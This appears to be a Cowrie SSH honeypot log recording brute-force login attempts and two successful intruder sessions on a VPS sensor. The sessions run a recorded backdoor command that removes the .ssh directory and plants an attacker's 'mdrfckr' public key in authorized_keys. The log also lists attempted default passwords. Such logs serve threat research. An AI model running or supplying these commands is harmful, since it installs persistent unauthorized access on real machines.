{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:46:53.899531Z","src_ip":"212.227.235.229","session":"cfaffed9acad"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:46:54.128801Z","src_ip":"212.227.235.229","session":"f4959e42deea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:46:54.157659Z","src_ip":"212.227.235.229","session":"cfaffed9acad"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":42124,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1cde5308501","protocol":"ssh","message":"New connection: 43.159.36.188:42124 (1.2.3.4:22) [session: e1cde5308501]","sensor":"my-vps","timestamp":"2025-08-31T05:46:54.823062Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:46:54.824353Z","src_ip":"43.159.36.188","session":"e1cde5308501"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44500,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb41fd876a09","protocol":"ssh","message":"New connection: 212.227.235.229:44500 (1.2.3.4:22) [session: fb41fd876a09]","sensor":"my-vps","timestamp":"2025-08-31T05:46:54.949584Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:46:54.950234Z","src_ip":"212.227.235.229","session":"fb41fd876a09"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:46:55.069268Z","src_ip":"43.159.36.188","session":"e1cde5308501"}
{"eventid":"cowrie.login.failed","username":"yuxiang","password":"yuxiang","message":"login attempt [yuxiang/yuxiang] failed","sensor":"my-vps","timestamp":"2025-08-31T05:46:55.186829Z","src_ip":"212.227.235.229","session":"cfaffed9acad"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:46:55.236381Z","src_ip":"212.227.235.229","session":"fb41fd876a09"}
{"eventid":"cowrie.login.success","username":"root","password":"Wo123456","message":"login attempt [root/Wo123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:46:55.250233Z","src_ip":"212.227.235.229","session":"f4959e42deea"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:46:55.808710Z","src_ip":"212.227.235.229","session":"f4959e42deea"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:46:55.809455Z","src_ip":"212.227.235.229","session":"f4959e42deea"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:46:55.810283Z","src_ip":"212.227.235.229","session":"f4959e42deea"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:46:56.081839Z","src_ip":"212.227.235.229","session":"f4959e42deea"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword2","message":"login attempt [root/P@ssword2] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:46:56.090143Z","src_ip":"43.159.36.188","session":"e1cde5308501"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"passwd","message":"login attempt [ftpuser/passwd] failed","sensor":"my-vps","timestamp":"2025-08-31T05:46:56.419290Z","src_ip":"212.227.235.229","session":"fb41fd876a09"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:46:56.447173Z","src_ip":"212.227.235.229","session":"cfaffed9acad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:46:56.596816Z","src_ip":"43.159.36.188","session":"e1cde5308501"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:46:56.597616Z","src_ip":"43.159.36.188","session":"e1cde5308501"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:46:56.598582Z","src_ip":"43.159.36.188","session":"e1cde5308501"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:46:56.680831Z","src_ip":"212.227.235.229","session":"f4959e42deea"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:46:56.681615Z","src_ip":"212.227.235.229","session":"f4959e42deea"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:46:56.844739Z","src_ip":"43.159.36.188","session":"e1cde5308501"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:46:56.954847Z","src_ip":"212.227.235.229","session":"f4959e42deea"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:46:56.955834Z","src_ip":"212.227.235.229","session":"f4959e42deea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33908,"dst_ip":"1.2.3.4","dst_port":22,"session":"2558262f403b","protocol":"ssh","message":"New connection: 212.227.235.229:33908 (1.2.3.4:22) [session: 2558262f403b]","sensor":"my-vps","timestamp":"2025-08-31T05:46:57.223602Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:46:57.224560Z","src_ip":"212.227.235.229","session":"2558262f403b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:46:57.794246Z","src_ip":"43.159.36.188","session":"e1cde5308501"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:46:57.794950Z","src_ip":"43.159.36.188","session":"e1cde5308501"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:46:57.797466Z","src_ip":"212.227.235.229","session":"2558262f403b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:46:58.042331Z","src_ip":"43.159.36.188","session":"e1cde5308501"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:46:58.043224Z","src_ip":"43.159.36.188","session":"e1cde5308501"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:46:58.083758Z","src_ip":"212.227.235.229","session":"fb41fd876a09"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":42132,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6acba9fa2d2","protocol":"ssh","message":"New connection: 43.159.36.188:42132 (1.2.3.4:22) [session: c6acba9fa2d2]","sensor":"my-vps","timestamp":"2025-08-31T05:46:58.286798Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:46:58.288263Z","src_ip":"43.159.36.188","session":"c6acba9fa2d2"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":14790,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed3c31483bf0","protocol":"ssh","message":"New connection: 80.94.95.15:14790 (1.2.3.4:22) [session: ed3c31483bf0]","sensor":"my-vps","timestamp":"2025-08-31T05:46:58.512049Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T05:46:58.512911Z","src_ip":"80.94.95.15","session":"ed3c31483bf0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:46:58.532751Z","src_ip":"43.159.36.188","session":"c6acba9fa2d2"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T05:46:58.564023Z","src_ip":"80.94.95.15","session":"ed3c31483bf0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:46:58.609644Z","src_ip":"212.227.235.229","session":"2558262f403b"}
{"eventid":"cowrie.login.failed","username":"default","password":"1","message":"login attempt [default/1] failed","sensor":"my-vps","timestamp":"2025-08-31T05:46:58.852379Z","src_ip":"80.94.95.15","session":"ed3c31483bf0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39794,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea4614ea3653","protocol":"ssh","message":"New connection: 212.227.125.160:39794 (1.2.3.4:22) [session: ea4614ea3653]","sensor":"my-vps","timestamp":"2025-08-31T05:46:59.408648Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:46:59.512759Z","src_ip":"43.159.36.188","session":"c6acba9fa2d2"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:46:59.879671Z","src_ip":"212.227.235.229","session":"2558262f403b"}
{"eventid":"cowrie.login.failed","username":"default","password":"default","message":"login attempt [default/default] failed","sensor":"my-vps","timestamp":"2025-08-31T05:46:59.905810Z","src_ip":"80.94.95.15","session":"ed3c31483bf0"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:46:59.936728Z","src_ip":"212.227.125.160","session":"ea4614ea3653"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 